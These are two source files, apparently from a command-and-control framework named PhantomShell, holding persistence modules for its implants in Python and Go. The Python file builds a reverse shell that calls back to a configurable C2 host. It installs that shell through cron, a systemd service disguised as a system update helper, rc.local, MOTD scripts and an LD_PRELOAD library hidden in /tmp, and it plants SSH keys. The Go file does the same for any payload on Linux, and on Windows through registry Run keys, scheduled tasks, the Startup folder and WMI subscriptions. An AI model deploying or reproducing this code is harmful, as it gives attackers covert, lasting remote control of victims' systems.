File: agents/python/modules/persist.py
"""Persistence mechanisms module."""

import os
import subprocess
import base64

NAME = "persist"


def _run(cmd: str) -> str:
    try:
        return subprocess.check_output(cmd, shell=True, stderr=subprocess.DEVNULL, timeout=15).decode(errors="replace").strip()
    except Exception:
        return ""


def _agent_callback(host: str, port: int) -> str:
    return f"python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"{host}\",{port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"


def cmd_persist_cron(interval: int = 5) -> dict:
    host = os.getenv("PS_C2_HOST", "0.0.0.0")
    port = int(os.getenv("PS_C2_PORT", "4444"))
    callback = _agent_callback(host, port)
    entry = f"*/{interval} * * * * {callback}"
    existing = _run("crontab -l 2>/dev/null")
    if callback in existing:
        return {"status": "already_installed", "type": "cron"}
    new_cron = f"{existing}\n{entry}" if existing else entry
    result = subprocess.run(f'echo "{new_cron}" | crontab -', shell=True,
                           capture_output=True, text=True)
    return {
        "status": "success" if result.returncode == 0 else "error",
        "type": "cron",
        "interval": interval,
        "error": result.stderr if result.returncode != 0 else None,
    }


def cmd_persist_ssh(key: str = "") -> dict:
    if not key:
        result = _run("cat ~/.ssh/id_rsa.pub 2>/dev/null")
        if not result:
            _run("ssh-keygen -t rsa -b 4096 -f ~/.ssh/id_rsa -N '' -q")
            result = _run("cat ~/.ssh/id_rsa.pub")
        key = result

    ssh_dir = os.path.expanduser("~/.ssh")
    os.makedirs(ssh_dir, mode=0o700, exist_ok=True)
    auth_keys = os.path.join(ssh_dir, "authorized_keys")

    existing = ""
    if os.path.exists(auth_keys):
        with open(auth_keys, "r") as f:
            existing = f.read()
    if key in existing:
        return {"status": "already_installed", "type": "ssh"}

    with open(auth_keys, "a") as f:
        f.write(f"\n{key}\n")
    os.chmod(auth_keys, 0o600)
    return {"status": "success", "type": "ssh", "key": key[:80] + "..."}


def cmd_persist_systemd() -> dict:
    host = os.getenv("PS_C2_HOST", "0.0.0.0")
    port = int(os.getenv("PS_C2_PORT", "4444"))
    callback = _agent_callback(host, port)
    service_name = "system-update-helper"

    unit = f"""[Unit]
Description=System Update Helper
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c '{callback}'
Restart=always
RestartSec=60

[Install]
WantedBy=multi-user.target
"""
    uid = os.getuid() if hasattr(os, "getuid") else 1000
    if uid == 0:
        path = f"/etc/systemd/system/{service_name}.service"
    else:
        path = os.path.expanduser(f"~/.config/systemd/user/{service_name}.service")
        os.makedirs(os.path.dirname(path), exist_ok=True)

    try:
        with open(path, "w") as f:
            f.write(unit)
        if uid == 0:
            _run(f"systemctl daemon-reload && systemctl enable {service_name}")
        else:
            _run(f"systemctl --user daemon-reload && systemctl --user enable {service_name}")
        return {"status": "success", "type": "systemd", "path": path}
    except PermissionError:
        return {"status": "error", "type": "systemd", "error": "Permission denied"}


def cmd_persist_rc() -> dict:
    host = os.getenv("PS_C2_HOST", "0.0.0.0")
    port = int(os.getenv("PS_C2_PORT", "4444"))
    callback = _agent_callback(host, port)
    rc_local = "/etc/rc.local"
    try:
        if os.path.exists(rc_local):
            with open(rc_local, "r") as f:
                content = f.read()
            if callback in content:
                return {"status": "already_installed", "type": "rc.local"}
        else:
            content = "#!/bin/bash\n"

        content = content.rstrip("\n") + f"\n{callback} &\nexit 0\n"
        with open(rc_local, "w") as f:
            f.write(content)
        os.chmod(rc_local, 0o755)
        return {"status": "success", "type": "rc.local", "path": rc_local}
    except PermissionError:
        return {"status": "error", "type": "rc.local", "error": "Permission denied (need root)"}


def cmd_persist_motd() -> dict:
    host = os.getenv("PS_C2_HOST", "0.0.0.0")
    port = int(os.getenv("PS_C2_PORT", "4444"))
    callback = _agent_callback(host, port)
    motd_dir = "/etc/update-motd.d"
    script_path = os.path.join(motd_dir, "99-update")
    try:
        with open(script_path, "w") as f:
            f.write(f"#!/bin/bash\n{callback} &\n")
        os.chmod(script_path, 0o755)
        return {"status": "success", "type": "motd", "path": script_path}
    except PermissionError:
        return {"status": "error", "type": "motd", "error": "Permission denied"}


def cmd_persist_ldpreload() -> dict:
    c_code = r"""
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void init() {
    if (fork() == 0) {
        setsid();
        system("CALLBACK_PLACEHOLDER");
        _exit(0);
    }
}
"""
    host = os.getenv("PS_C2_HOST", "0.0.0.0")
    port = int(os.getenv("PS_C2_PORT", "4444"))
    c_code = c_code.replace("CALLBACK_PLACEHOLDER", _agent_callback(host, port))
    src = "/tmp/.libsystem.c"
    lib = "/tmp/.libsystem.so"
    try:
        with open(src, "w") as f:
            f.write(c_code)
        result = _run(f"gcc -shared -fPIC -o {lib} {src} -nostartfiles 2>&1")
        os.unlink(src)
        if os.path.exists(lib):
            with open("/etc/ld.so.preload", "a") as f:
                f.write(f"{lib}\n")
            return {"status": "success", "type": "ld_preload", "path": lib}
        return {"status": "error", "type": "ld_preload", "error": result}
    except PermissionError:
        return {"status": "error", "type": "ld_preload", "error": "Permission denied"}


def cmd_persist_all() -> dict:
    results = {}
    for name, func in [("cron", cmd_persist_cron), ("ssh", cmd_persist_ssh),
                        ("systemd", cmd_persist_systemd), ("rc", cmd_persist_rc)]:
        try:
            results[name] = func()
        except Exception as e:
            results[name] = {"status": "error", "error": str(e)}
    return {"installed": results}


COMMANDS = {
    "persist_all": {"handler": cmd_persist_all, "description": "Install all applicable persistence"},
    "persist_cron": {"handler": cmd_persist_cron, "description": "Cron-based persistence"},
    "persist_ssh": {"handler": cmd_persist_ssh, "description": "SSH key persistence"},
    "persist_systemd": {"handler": cmd_persist_systemd, "description": "Systemd service persistence"},
    "persist_rc": {"handler": cmd_persist_rc, "description": "rc.local persistence"},
    "persist_motd": {"handler": cmd_persist_motd, "description": "MOTD persistence"},
    "persist_ldpreload": {"handler": cmd_persist_ldpreload, "description": "LD_PRELOAD persistence"},
}

File: agents/go/modules/persist.go
package modules

import (
	"fmt"
	"os"
	"path/filepath"
	"runtime"
	"strings"

	"github.com/OmonovSarvar/PhantomShell/agents/go/core"
)

func RegisterPersist(d *core.Dispatcher, exec *core.Executor) {
	d.Register("persist", handlePersist(exec))
	d.Register("persist_list", handlePersistList)
}

func handlePersist(exec *core.Executor) core.Handler {
	return func(args map[string]interface{}) map[string]interface{} {
		method := getString(args, "method")
		payload := getString(args, "payload") // command or binary path to persist
		name := getString(args, "name")
		if name == "" {
			name = "syshelper"
		}

		if payload == "" {
			return map[string]interface{}{"status": "error", "error": "payload required"}
		}

		if runtime.GOOS == "windows" {
			return persistWindows(exec, method, payload, name)
		}
		return persistLinux(exec, method, payload, name)
	}
}

func persistLinux(exec *core.Executor, method, payload, name string) map[string]interface{} {
	switch method {
	case "cron":
		cronLine := fmt.Sprintf("* * * * * %s", payload)
		cmd := fmt.Sprintf(`(crontab -l 2>/dev/null; echo "%s") | crontab -`, cronLine)
		_, stderr, code := exec.Run(cmd, 0)
		if code != 0 {
			// Fallback: write directly to spool
			spoolPath := fmt.Sprintf("/var/spool/cron/crontabs/%s", os.Getenv("USER"))
			if err := appendToFile(spoolPath, cronLine+"\n"); err != nil {
				return map[string]interface{}{"status": "error", "error": fmt.Sprintf("cron: %s / %s", stderr, err)}
			}
		}
		return map[string]interface{}{"status": "success", "method": "cron"}

	case "systemd":
		unit := fmt.Sprintf(`[Unit]
Description=%s Service
After=network.target

[Service]
Type=simple
ExecStart=%s
Restart=always
RestartSec=30

[Install]
WantedBy=multi-user.target
`, name, payload)
		unitPath := fmt.Sprintf("/etc/systemd/system/%s.service", name)
		if err := os.WriteFile(unitPath, []byte(unit), 0644); err != nil {
			return map[string]interface{}{"status": "error", "error": err.Error()}
		}
		exec.Run("systemctl daemon-reload", 0)
		exec.Run(fmt.Sprintf("systemctl enable %s.service", name), 0)
		return map[string]interface{}{"status": "success", "method": "systemd", "path": unitPath}

	case "bashrc":
		home := os.Getenv("HOME")
		rcPath := filepath.Join(home, ".bashrc")
		line := fmt.Sprintf("\n# system update check\nnohup %s >/dev/null 2>&1 &\n", payload)
		if err := appendToFile(rcPath, line); err != nil {
			return map[string]interface{}{"status": "error", "error": err.Error()}
		}
		return map[string]interface{}{"status": "success", "method": "bashrc", "path": rcPath}

	case "profile":
		home := os.Getenv("HOME")
		profPath := filepath.Join(home, ".profile")
		line := fmt.Sprintf("\n%s >/dev/null 2>&1 &\n", payload)
		if err := appendToFile(profPath, line); err != nil {
			return map[string]interface{}{"status": "error", "error": err.Error()}
		}
		return map[string]interface{}{"status": "success", "method": "profile", "path": profPath}

	case "ssh_key":
		pubKey := getString(map[string]interface{}{"k": payload}, "k")
		home := os.Getenv("HOME")
		sshDir := filepath.Join(home, ".ssh")
		os.MkdirAll(sshDir, 0700)
		authPath := filepath.Join(sshDir, "authorized_keys")
		if err := appendToFile(authPath, "\n"+pubKey+"\n"); err != nil {
			return map[string]interface{}{"status": "error", "error": err.Error()}
		}
		os.Chmod(authPath, 0600)
		return map[string]interface{}{"status": "success", "method": "ssh_key", "path": authPath}

	case "rc_local":
		rcPath := "/etc/rc.local"
		content := fmt.Sprintf("#!/bin/sh\n%s &\nexit 0\n", payload)
		existing, err := os.ReadFile(rcPath)
		if err == nil {
			// Insert before 'exit 0'
			old := string(existing)
			if strings.Contains(old, "exit 0") {
				content = strings.Replace(old, "exit 0", fmt.Sprintf("%s &\nexit 0", payload), 1)
			}
		}
		if err := os.WriteFile(rcPath, []byte(content), 0755); err != nil {
			return map[string]interface{}{"status": "error", "error": err.Error()}
		}
		return map[string]interface{}{"status": "success", "method": "rc_local", "path": rcPath}

	case "ld_preload":
		// Write a shared object path to /etc/ld.so.preload
		if err := appendToFile("/etc/ld.so.preload", payload+"\n"); err != nil {
			return map[string]interface{}{"status": "error", "error": err.Error()}
		}
		return map[string]interface{}{"status": "success", "method": "ld_preload"}

	default:
		return map[string]interface{}{
			"status": "error",
			"error":  fmt.Sprintf("unknown method: %s (linux methods: cron, systemd, bashrc, profile, ssh_key, rc_local, ld_preload)", method),
		}
	}
}

func persistWindows(exec *core.Executor, method, payload, name string) map[string]interface{} {
	switch method {
	case "registry":
		cmd := fmt.Sprintf(`reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "%s" /t REG_SZ /d "%s" /f`, name, payload)
		_, stderr, code := exec.Run(cmd, 0)
		if code != 0 {
			return map[string]interface{}{"status": "error", "error": stderr}
		}
		return map[string]interface{}{"status": "success", "method": "registry"}

	case "schtask":
		cmd := fmt.Sprintf(`schtasks /create /tn "%s" /tr "%s" /sc onlogon /rl highest /f`, name, payload)
		_, stderr, code := exec.Run(cmd, 0)
		if code != 0 {
			return map[string]interface{}{"status": "error", "error": stderr}
		}
		return map[string]interface{}{"status": "success", "method": "schtask"}

	case "startup":
		startupDir := filepath.Join(os.Getenv("APPDATA"), `Microsoft\Windows\Start Menu\Programs\Startup`)
		batPath := filepath.Join(startupDir, name+".bat")
		content := fmt.Sprintf("@echo off\nstart /b \"\" \"%s\"\n", payload)
		if err := os.WriteFile(batPath, []byte(content), 0644); err != nil {
			return map[string]interface{}{"status": "error", "error": err.Error()}
		}
		return map[string]interface{}{"status": "success", "method": "startup", "path": batPath}

	case "wmi":
		// WMI event subscription for persistence
		filter := fmt.Sprintf(`wmic /namespace:"\\root\subscription" path __EventFilter create Name="%s", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"`, name)
		consumer := fmt.Sprintf(`wmic /namespace:"\\root\subscription" path CommandLineEventConsumer create Name="%s", CommandLineTemplate="%s"`, name, payload)
		binding := fmt.Sprintf(`wmic /namespace:"\\root\subscription" path __FilterToConsumerBinding create Filter='__EventFilter.Name="%s"', Consumer='CommandLineEventConsumer.Name="%s"'`, name, name)

		exec.Run(filter, 0)
		exec.Run(consumer, 0)
		_, stderr, code := exec.Run(binding, 0)
		if code != 0 {
			return map[string]interface{}{"status": "error", "error": stderr}
		}
		return map[string]interface{}{"status": "success", "method": "wmi"}

	default:
		return map[string]interface{}{
			"status": "error",
			"error":  fmt.Sprintf("unknown method: %s (windows methods: registry, schtask, startup, wmi)", method),
		}
	}
}

func handlePersistList(args map[string]interface{}) map[string]interface{} {
	if runtime.GOOS == "windows" {
		return map[string]interface{}{
			"status":  "success",
			"methods": []string{"registry", "schtask", "startup", "wmi"},
		}
	}
	return map[string]interface{}{
		"status":  "success",
		"methods": []string{"cron", "systemd", "bashrc", "profile", "ssh_key", "rc_local", "ld_preload"},
	}
}

func appendToFile(path, content string) error {
	f, err := os.OpenFile(path, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
	if err != nil {
		return err
	}
	defer f.Close()
	_, err = f.WriteString(content)
	return err
}
